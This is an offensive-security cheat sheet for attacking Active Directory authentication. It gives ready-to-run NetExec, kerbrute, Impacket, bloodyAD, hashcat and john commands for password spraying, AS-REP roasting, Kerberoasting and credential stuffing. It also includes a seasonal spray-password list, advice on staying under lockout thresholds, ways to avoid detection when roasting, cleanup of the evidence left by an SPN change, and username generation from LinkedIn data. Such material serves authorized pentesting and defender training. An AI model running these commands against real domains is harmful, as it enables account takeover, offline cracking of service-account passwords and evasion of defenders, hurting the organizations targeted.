Authentication Attacks

Password spraying, brute forcing, AS-REP roasting, Kerberoasting, and credential stuffing against Active Directory. Covers tooling from both Linux and Windows.

Sections Authentication Attacks

You have a foothold (or just network access) and need to compromise accounts. These attacks target the AD authentication mechanisms directly: weak passwords via spraying, missing preauth via AS-REP roasting, service accounts via Kerberoasting, and reused credentials via stuffing.

Password Spraying

Try one or two passwords against every user in the domain. The goal is to find accounts with common or default passwords without triggering lockouts.

Pre-Spray Checklist

Always check the password policy before spraying. One wrong move locks out accounts and burns your access.

terminal
# Get password policy (lockout threshold, observation window)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --pass-pol
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --pass-pol

# Also check for fine-grained password policies (may have different lockout thresholds)
root@localhost:~# ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' -b "CN=Password Settings Container,CN=System,DC=corp,DC=local" "(objectClass=msDS-PasswordSettings)" cn msDS-LockoutThreshold msDS-PSOAppliesTo
If the lockout threshold is 5 and the observation window is 30 minutes, you can safely spray 4 attempts per user, then wait 30 minutes before the next round. Never exceed threshold minus one.

Remote (Linux) 

# NetExec - spray a single password against a user list (SMB)
netexec smb 10.10.11.35 -u users.txt -p 'Winter2026!' --continue-on-success

# NetExec - spray via LDAP (different protocol, sometimes less monitored)
netexec ldap 10.10.11.35 -u users.txt -p 'Winter2026!' --continue-on-success

# NetExec - multiple passwords, no brute force (one password per user)
netexec smb 10.10.11.35 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# kerbrute - Kerberos-based spray (does not cause lockout on pre-auth failures)
kerbrute passwordspray --dc 10.10.11.35 -d corp.local users.txt 'Winter2026!'

# Spray across multiple DCs / hosts
netexec smb 10.10.11.0/24 -u users.txt -p 'Corp@2026!' --continue-on-success

Common Spray Passwords

Build a targeted password list based on the organization.

terminal
# Seasonal patterns
Winter2026!
Spring2026!
Summer2025!
Fall2025!

# Company name patterns
Corp@2026
Corp2026!
Corp123!
Welcome1!
Password1!
P@ssw0rd

# Month-year patterns
March2026!
February2026!
January2026!
Look at the password policy minimum length and complexity requirements. If the policy requires 8 characters with complexity, passwords like Season+Year+! are the most common pattern. If you find the company name from LinkedIn or the website, use that as the base.

AS-REP Roasting

Accounts with the DONT_REQUIRE_PREAUTH flag set do not need to prove they know the password before the DC issues an AS-REP. The AS-REP contains the user’s encrypted TGT, which can be cracked offline.

Finding AS-REP Roastable Accounts 

# NetExec
netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --asreproast asrep_hashes.txt

# ldapsearch
ldapsearch -x -H ldap://10.10.11.35 -D "svc_backup@corp.local" -w 'P@ssw0rd123' \
  -b "DC=corp,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName

# Impacket - with creds (enumerate and roast)
impacket-GetNPUsers corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -request -format hashcat -outputfile asrep_hashes.txt

# Impacket - without creds (provide a user list)
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.10.11.35 -no-pass -format hashcat -outputfile asrep_hashes.txt

Cracking AS-REP Hashes

terminal
# Hashcat (mode 18200 for AS-REP)
root@localhost:~# hashcat -m 18200 asrep_hashes.txt /usr/s/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
root@localhost:~# john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
AS-REP roasting works without credentials if you have a list of usernames. The DC will return an AS-REP for any account with DONT_REQUIRE_PREAUTH set, even if you provide no password. This makes it a great first step when you have usernames but no creds.

Kerberoasting

Any authenticated domain user can request a TGS (service ticket) for any SPN registered in the domain. The TGS is encrypted with the service account’s password hash. Extract it and crack it offline.

Finding and Roasting SPNs 

# Impacket GetUserSPNs - enumerate and request TGS in one step
impacket-GetUserSPNs corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -request -outputfile kerb_hashes.txt

# Impacket - with NTLM hash
impacket-GetUserSPNs corp.local/svc_backup -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -dc-ip 10.10.11.35 -request -outputfile kerb_hashes.txt

# Impacket - with Kerberos ticket
export KRB5CCNAME=/tmp/svc_backup.ccache
impacket-GetUserSPNs corp.local/svc_backup -dc-ip 10.10.11.35 -k -no-pass -request -outputfile kerb_hashes.txt

# NetExec
netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --kerberoasting kerb_hashes.txt

Cracking TGS Hashes

terminal
# Hashcat - Kerberos 5 TGS-REP (RC4, mode 13100)
root@localhost:~# hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Hashcat - Kerberos 5 TGS-REP (AES256, mode 19700)
root@localhost:~# hashcat -m 19700 k.txt /usr/share/wordlists/rockyou.txt

# John the Ripper
root@localhost:~# john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt kerb_hashes.txt

Targeted Kerberoasting

If you have GenericWrite or GenericAll on a user, you can set an SPN on them to make them Kerberoastable, even if they did not have one before.

# Set SPN with bloodyAD
bloodyAD -d corp.local -u svc_backup -p 'P@ssw0rd123' --host 10.10.11.35 set object targetuser servicePrincipalName -v "MSSQLSvc/fake.corp.local:1433"

# Roast the target
impacket-GetUserSPNs corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35 -request -outputfile targeted_kerb.txt

# Clean up - remove the SPN
bloodyAD -d corp.local -u svc_backup -p 'P@ssw0rd123' --host 10.10.11.35 set object targetuser servicePrincipalName
Targeted Kerberoasting leaves evidence. The SPN modification generates event ID 4738 (user account changed). Always clean up the SPN after extracting the hash.

Kerberoasting OPSEC

Technique Detection Risk Notes
Request RC4 TGS (/tgtdeleg) High Requesting RC4 when AES is supported triggers alerts
Request AES TGS (/aes) Lower Matches normal traffic patterns, but harder to crack
Roast all SPNs at once High Burst of TGS requests from a single user
Roast one SPN at a time Lower Spread requests over time to blend with normal traffic
Target only high-value SPNs Lowest Focus on service accounts with old passwords (check passwordLastSet)
Prioritize targets by passwordLastSet. Service accounts with passwords set years ago are more likely to have weak, crackable passwords. An account with a password set last week was probably just rotated and will be harder to crack.

Credential Stuffing

If you have credentials from a breach database, test them against the domain. Users frequently reuse passwords across personal and corporate accounts.

terminal
# NetExec with user:password pairs
root@localhost:~# netexec smb 10.10.11.35 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Format: each line in users.txt corresponds to the same line in passwords.txt
# users.txt:     passwords.txt:
# jsmith          Summer2024!
# admin.jones     Welcome123
# svc_backup      Backup@Corp

# Alternative: combined file with user:password format
root@localhost:~# while IFS=: read -r user pass; do \
  netexec smb 10.10.11.35 -u "$user" -p "$pass" 2>/dev/null | grep "+" \
done < creds.txt
The --no-bruteforce flag in NetExec pairs users and passwords line-by-line instead of trying every password against every user. This is what you want for credential stuffing where you have specific user:password pairs.

Username Generation

Before spraying, you need a user list. If you have employee names (from LinkedIn, company website, breach data), generate potential usernames.

terminal
# Common username formats
# John Smith -> jsmith, john.smith, j.smith, smithj, john_smith

# namemash.py (generate all common formats from a name list)
root@localhost:~# python3 namemash.py names.txt > users.txt

# Quick bash generation
while IFS=' ' read -r first last; do
  first=$(echo "$first" | tr '[:upper:]' '[:lower:]')
  last=$(echo "$last" | tr '[:upper:]' '[:lower:]')
  echo "${first}.${last}"
  echo "${first:0:1}${last}"
  echo "${first}${last:0:1}"
  echo "${first}_${last}"
  echo "${last}${first:0:1}"
done < names.txt | sort -u > users.txt

# Validate usernames via Kerberos (no creds needed)
root@localhost:~# kerbrute userenum --dc 10.10.11.35 -d corp.local users.txt
If you compromise one account, check its sAMAccountName format to determine the naming convention. Then generate usernames using that same pattern for everyone else on your name list.